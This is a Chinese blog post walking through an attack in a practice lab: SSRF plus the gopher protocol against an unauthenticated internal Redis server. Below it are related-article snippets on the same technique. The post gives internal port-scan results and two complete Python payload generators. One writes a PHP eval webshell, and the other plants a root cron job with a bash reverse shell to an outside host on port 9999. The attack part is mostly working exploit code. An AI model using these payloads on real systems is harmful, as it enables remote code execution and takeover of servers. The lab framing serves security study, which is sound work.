SSRF + gopher 打内网redis

最新推荐文章于 2025-03-31 22:16:57 发布
最新推荐文章于 2025-03-31 22:16:57 发布 · 720 阅读 · 27
文章标签:

#redis #数据库 #缓存

SSRF + gopher 打内网redis

0x01:环境搭建:

使用的是国光师傅的靶场

GitHub - sqlsec/ssrf-vuls: 国光的手把手带你用 SSRF 打穿内网靶场源码

0x02:漏洞发现:

存在SSRF漏洞

0x03:漏洞利用:

接下来读取hosts文件

发现当前机器内网IP

探测内网IP 端口

爆破出的情况:

172.72.23.21 - 80
172.72.23.22 - 80
172.72.23.23 - 80、3306
172.72.23.24 - 80
172.72.23.25 - 80
172.72.23.26 - 8080
172.72.23.27 - 6379
172.72.23.28 - 6379
172.72.23.29 - 3306

可以看到

27 28两个IP是redis默认端口6379

使用dict直接访问一下

存在未授权访问漏洞, 配合gopher协议, 直接上shell

gopher要搭配数据流来使用, 构造太复杂, 所以使用脚本来生成Payload

脚本内容如下:

import urllib.parse
​
protocol = "gopher://"
ip = "x.x.x.x"
port = "6379"
shell = "\n\n<?php eval($_POST[\"afk\"]);?>\n\n"
filename = "afk.php"
path = "/tmp"
passwd = ""
cmd = ["flushall",
     "set 1 {}".format(shell.replace(" ","${IFS}")),  
     "config set dir {}".format(path),
     "config set dbfilename {}".format(filename),
     "save",
     "quit"
    ]
if passwd:
    cmd.insert(0,"AUTH {}".format(passwd))
payload = protocol + ip + ":" + port + "/_"
def redis_format(arr):
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        cmd += CRLF + "$" + str(len((x.replace("${IFS}"," ")))) + CRLF + x.replace("${IFS}"," ")
    cmd += CRLF
    return cmd
​
if __name__=="__main__":
    for x in cmd:
        payload += urllib.parse.quote(redis_format(x))
​
    # print(payload)
    print(urllib.parse.quote(payload))

全部OK

进入镜像命令:

docker exec -it 镜像id bin/bash

成功写入

0x04:计划任务反弹shell:

脚本内容换成

import urllib.parse
​
protocol = "gopher://"
ip = "172.72.23.27"
port = "6379"
shell = "\n\n * * * * * /bin/bash -i >& /dev/tcp/x.x.x.x/9999 0>&1\n\n"
filename = "root"
path = "/var/spool/cron"
passwd = ""
cmd = ["flushall",
     "config set dir {}".format(path),
     "config set dbfilename {}".format(filename),
     "set x {}".format(shell.replace(" ","${IFS}")),  
     "save"
    ]
if passwd:
    cmd.insert(0,"AUTH {}".format(passwd))
payload = protocol + ip + ":" + port + "/_"
def redis_format(arr):
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        cmd += CRLF + "$" + str(len((x.replace("${IFS}"," ")))) + CRLF + x.replace("${IFS}"," ")
    cmd += CRLF
    return cmd
​
if __name__=="__main__":
    for x in cmd:
        payload += urllib.parse.quote(redis_format(x))
​
    # print(payload)
    print(urllib.parse.quote(payload))

写了一个计划任务, 反弹shell

反弹shell成功

Shadowyz.
关注
SSRF---gopher和dict打redis
unexpectedthing的博客
12-01 6670
前言 之前关于SSRFredis(redis的未授权漏洞)都没咋总结,现在总结一下。 redis简介 redis是一个key-value存储系统,是一个开源(BSD许可)的,内存中的数据结构存储系统,它可以用作数据库缓存和消息中间件。 它支持多种类型的数据结构,如 字符串(strings), 散列(hashes), 列表(lists), 集合(sets), 有序集合(sorted sets) 与范围查询, bitmaps, hyperloglogs 和 地理空间(geospatial) 索引半径查询。
利用SSRFgopherRedis未授权(.py版)
qq_44324297的博客
07-13 396
利用SSRFgopherRedis未授权(.py版) docker,lamp
利用 SSRFRedis 未授权访问进行内网渗透
最新发布
智商不在服务区的博客
03-31 971
在本次实验中,我们使用 Docker 环境进行测试。解压实验包,搭建docker环境。docker环境web的dockerfile主要利用代码redis服务器通过启动相关容器,初次启动失败。发现docker版本问题,删除docker版本 3,并尝试重新拉取重新启动后,环境成功搭建,获取内网 IP。我们使用抓包工具检测内网存活主机,发现172.18.0.2存在HTTP服务,并返回Go away。使用burpsuite对172.18.0.2进行端口扫描,发现6379端口返回Redis
SSRF+Redis内网渗透二
zj2084的博客
03-15 936
需要满足Gopher的协议要求,其数据格式为:gopher://ip:port/_TCP/IP数据流,比如针对Redis的操作,协议需要gopher://127.0.0.1:6379/_开头,后面跟上基于TCP协议的原始数据包。在这一点上,Dict协议相对方便一些,但是两者有很大差别,比如dict只支持Redis的单条命令,而Gopher可以很好地支持批量命令处理,在针对需要密码登录Redis的情况下,dict也无能为力而Gopher可以很好地完成。替换后的结果如下所示,然后将前面的\r\n给删除即可。
SSRF漏洞理解进阶&SSRF+gopher内网redis、mysql、fastcgi)& SSRF相关基础概念
东隅的博客
10-25 9838
SSRF漏洞理解进阶&SSRF+gopher内网redis、mysql、fastcgi)& SSRF相关基础概念。首先要了解几个概念:内网&外网代理curlgopher、ftp、dict伪协议file_get_contents()、 fsockopen() 、curl_exec() 等函数。
SSRF+Redis进行内网渗透
zhuge_long的专栏
10-24 1455
gopher协议(信息查找协议),一般用来攻击redis,mysql等服务。其利用的数据格式gopher://ip:端口/_数据,数据的前面需要有_,数据一般需要进行url编码。
Root me CTF all the day靶场ssrf+redis漏洞
M372109150的博客
10-10 1737
本篇介绍了root me CTF all the day靶场的SSRF BOX中的漏洞,使用SSRF+redis 获取内网主机权限,利用SSRF来对redis的未授权访问执行命令。从而达到获取主机权限的目的。
ssrf+redis未授权访问漏洞复现
yfy0308的博客
08-28 1334
接着我们便可以尝试 redis 未授权了,由于这台内网主机上还存在一个http服务,所以我们可以将webshell写入其web目录,然后用ssrf进行访问。但是我们尝试发现不能直接在/var/www/html目录下写文件,我们使用burp扫一下都有哪些目录,发现有个upload目录。说明172.17.0.2是内网中存活的另一台主机,并且上面也运行着http服务。ssrf:服务器请求伪造漏洞,有一个参数,这个参数可以接收一个网址,可以在本地页面解析,解析过程 中没有进行过滤。
SSRFRedis进行内网渗透
zhuge_long的专栏
12-07 943
gopher协议(信息查找协议),一般用来攻击redis,mysql等服务。其利用的数据格式gopher://ip:端口/_数据,数据的前面需要有_,数据一般需要进行url编码。
Redis未授权访问及配合SSRF总结
saber的博客
10-24 1461
Redis是一个开源的内存数据库,它用于存储数据,并提供高性能、可扩展性和丰富的数据结构支持。默认情况下,会绑定在,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问Redis的情况下,利用Redis自身的提供的config命令,可以进行写文件操作,并且写公匙登录。
web渗透测试之(未授权访问漏洞redis)反弹shell SSRF结合redis结合伪协议(已更新)
浩策盾悟
02-12 7094
http:// 主要用于探测主机存活和端口的开放情况dict:// 字典服务器协议,访问字典资源,如,dict:///ip:6739/info1探测信息有时候返回的信息比较多2发送指令3运行指令sftp://SSH文件传输协议或安全文件传输协议探测文件时上传下载的 ftp针对21端口gopher:// 分布式文档传递服务,可使用gopherus生成payloadssh基于gopher发起攻击file:/// 从文。
SSRF && Gopher && Redis && FastCGI
3569
05-26 2516
之前没尝试过 SSRFRedis,虽然是老的东西了,但是自己试一下socat : socat是一個netcat(nc)的替代產品,可以稱得上nc++。socat的特點就是在兩個流之間建立一個雙向的通道。socat的地址類型很 多,有ip, tcp, udp, ipv6,pipe,exec,system,open,proxy,openssl,等等。redis 新版本貌似开启了safemode,...
重生之我是赏金猎人(六)-强行多次FUZZ发现某厂商SSRFredis密码喷洒批量反弹Shell
weixin_44948325的博客
03-26 2862
0x00 项目背景 该系列旨在分享自己和团队在SRC、项目实战漏洞测试过程中的有趣案例,如果读者能从本项目习得一些有用的知识,那么笔者将非常荣幸。 该系列首发github:https://github.com/J0o1ey/BountyHunterInChina 本项目由M78sec维护,未经授权,文章严禁私自修改版权转载。 0x01 前言 有技术交流或渗透测试培训需求的朋友欢迎联系QQ/VX-547006660,需要代码审计、渗透测试、红蓝对抗⽹络安全相关业务可以联系我司 2000⼈⽹络安全交流群,欢迎⼤
ip限制绕过及gopherredis的利用讲解
DKPT的博客
12-05 206
gopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。gopher协议是一个互联网上使用的分布型的文件搜集获。
CTFHUB--SSRF(中)--FastCGI协议\Redis协议 以及gopherus工具攻击
qq_75120258的博客
03-29 2715
本来我们可以执行任意文件,但是在FPM某个版本之后,增加了security.limit_extensions选项,限定了只有某些后缀的文件允许被fpm执行,默认是.php,所以现在要使用这个漏洞,我们得先知道服务器上的一个php文件,假设我们爆破不出来目标环境的web目录,我们可以找找默认源安装后可能存在的php文件,比如/usr/local/lib/php/PEAR.php。FastCGI是一个常驻型的CGI,它在服务器启动的时候先启动一个应用程序池,然后由这个应用程序池来管理和调度应用程序的执行。
Redis渗透&SSRF的利用-看这一篇就够了
永远都没有了
02-05 2259
关于redis的渗透利用,及SSRF的方式
【渗透测试】redis漏洞利用
网络安全从业者的学习笔记
03-16 2219
redis是一个key-value存储系统,在诸多版本中存在一系列的漏洞,对漏洞进行复现:写入Webshell、写入定时任务、主从复制命令执行、如何通过利用SSRF结合gopher、dict协议打redis。切勿利用漏洞非法获取数据
Redis利用方式总结(Linux/Windows)
weixin_50464560的博客
11-02 5637
原文在这:https://blog.youkuaiyun.com/qq_26091745/article/details/117222362?utm_source=app&app_version=4.17.2&code=app_1562916241&uLinkId=usr1mkqgl919blen 简述 本文收录整理了https://xz.aliyun.com/t/7940 https://www.redmango.top/article/51 等文章 感谢作者们无私分享利用redis优秀姿
SSRFredis
c582037的博客
01-09 199
ssrfredis
ssrf gopher例题
03-08
攻击目标是通过该接口访问内网Redis服务(端口6379),利用Gopher协议实现未授权命令执行。 --- #### 手动构造Gopher攻击载荷 1. **Redis命令构造** 假设目标Redis允许写入webshell: ```bash flushall set ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值